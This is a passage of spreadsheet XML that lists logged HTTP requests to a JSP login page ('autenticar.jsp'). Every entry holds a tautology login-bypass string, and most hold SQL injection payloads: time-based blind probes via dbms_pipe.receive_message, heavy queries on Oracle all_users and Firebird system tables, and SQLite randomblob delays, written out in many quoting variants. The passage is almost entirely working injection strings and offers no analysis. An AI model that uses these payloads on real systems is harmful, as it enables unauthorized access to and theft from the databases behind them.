    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6097'or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and'chyr'='chyr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7773</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3396')or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and('qacl'like'qacl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8853</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3307'))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and(('wdbo'like'wdbo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7285</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-740')))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and((('ytzx'like'ytzx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-627</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-290'or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and'fktu'like'fktu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4695</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1794")or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and("cyea"="cyea</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1068</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4845"))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and(("tsvz"="tsvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4445</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-839")))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and((("rzrm"="rzrm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2354</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6154"or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and"acok"="acok</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2803</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2819")or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and("jrkj"like"jrkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6647</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7819"))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and(("begy"like"begy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8472</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7347")))or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and((("kqkj"like"kqkj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2977"or2010=dbms_pipe.receive_message(chr(88)||chr(90)||chr(122)||chr(70),5)and"ubzr"like"ubzr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6147</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7612)or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1428</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3768')or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5444'or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2828</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1534"or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-525</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-845)or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(9621=9621</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7286</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1142))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((104=104</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5955</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1501)))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(((2709=2709</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2349</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9594or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5712</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1791')or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and('kjgh'='kjgh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7607</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3930'))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(('dpgm'='dpgm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8194</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2644')))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((('raxs'='raxs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5851</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9380'or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and'nsfa'='nsfa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2189</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2284')or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and('fuhz'like'fuhz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-334</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3140'))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(('kudi'like'kudi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1388</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3208')))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((('vafa'like'vafa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8077</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5470'or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and'vfgi'like'vfgi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2769</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2465")or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and("evui"="evui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7171</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6494"))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(("zung"="zung</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2706</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9798")))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((("lfec"="lfec</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4028</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-316"or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and"sfvz"="sfvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8389</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9422")or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and("rrlb"like"rrlb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7421</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7443"))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and(("szya"like"szya</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3361</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2898")))or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and((("fyoi"like"fyoi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8546</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9385"or2624=(selectcount(*)fromall_userst1,all_userst2,all_userst3,all_userst4,all_userst5)and"zftz"like"zftz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-554</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5804)or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2068</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9812')or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7873</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5295'or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9282</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5675"or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5596</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3288)or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(3124=3124</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9496</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3576))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((4163=4163</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3201</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8561)))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(((3697=3697</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4408or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9072</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-599')or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and('giph'='giph</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6480</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8341'))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(('kruf'='kruf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8058</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5549')))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((('mluu'='mluu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4202</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6990'or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and'qrqh'='qrqh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3753</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3682')or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and('clxa'like'clxa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8390'))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(('trnu'like'trnu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6411</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1673')))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((('icsn'like'icsn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2790</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9909'or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and'dslk'like'dslk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7662</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8409")or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and("ssoh"="ssoh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-283</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9248"))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(("ahce"="ahce</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8988</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6241")))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((("pkfi"="pkfi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-922</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2131"or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and"zxxo"="zxxo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2432</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7338")or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and("yqnx"like"yqnx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7472</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1136"))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and(("ockz"like"ockz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5038</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8524")))or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and((("vlkm"like"vlkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4084</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1806"or5937=like(x'41'||x'42'||x'43'||x'44'||x'45'||x'46'||x'47',upper(hex(randomblob(50000000))))and"hayv"like"hayv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2044)or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1529</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3471')or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1722'or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6110</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-575"or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1199</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1285)or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(9211=9211</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7551</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3248))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((1160=1160</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6421</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7486)))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(((4153=4153</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7181</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-860or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5286</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9329')or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and('ckaq'='ckaq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4772'))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and(('kndt'='kndt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6387</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-832')))or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and((('skwr'='skwr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3651</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6261'or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and'fthf'='fthf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-273</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2598')or6526=(selectcount(*)fromrdb$fieldsast1,rdb$typesast2,rdb$collationsast3)and('cxna'like'cxna</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-339</t>
  </si>
  <si>
